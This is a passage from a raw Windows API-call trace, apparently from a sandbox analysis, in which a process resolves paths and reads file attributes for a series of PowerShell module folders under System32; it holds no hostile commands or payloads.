GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0263.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.101] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fe8680, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0263.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0263.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.102] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7e4c9a8, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0263.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0263.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.102] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0263.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent", nBufferLength=0x3b, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0263.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0263.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", nBufferLength=0x39, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0263.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0263.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x3e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0263.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe2e454, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0263.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x41, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0263.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe2e454, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0263.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x49, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0263.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.105] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0263.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x3b, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0263.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.105] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0263.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x3a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39 [0263.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.106] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0263.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x3a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39 [0263.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.106] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0263.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x3f, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e [0263.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.107] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0263.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x41, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0263.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.107] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe77f21, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0263.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x3c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0263.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.107] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe9f62b, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0263.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x4d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c [0263.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.108] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe9f62b, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x48 [0263.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x48, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", lpFilePart=0x0) returned 0x47 [0263.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.108] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0263.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", nBufferLength=0x45, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", lpFilePart=0x0) returned 0x44 [0263.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0263.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", nBufferLength=0x3e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", lpFilePart=0x0) returned 0x3d [0263.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pcsvdevice"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PersistentMemory", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0263.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PersistentMemory", nBufferLength=0x44, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PersistentMemory", lpFilePart=0x0) returned 0x43 [0263.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.110] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PersistentMemory" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\persistentmemory"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0263.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", nBufferLength=0x37, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", lpFilePart=0x0) returned 0x36 [0263.110] 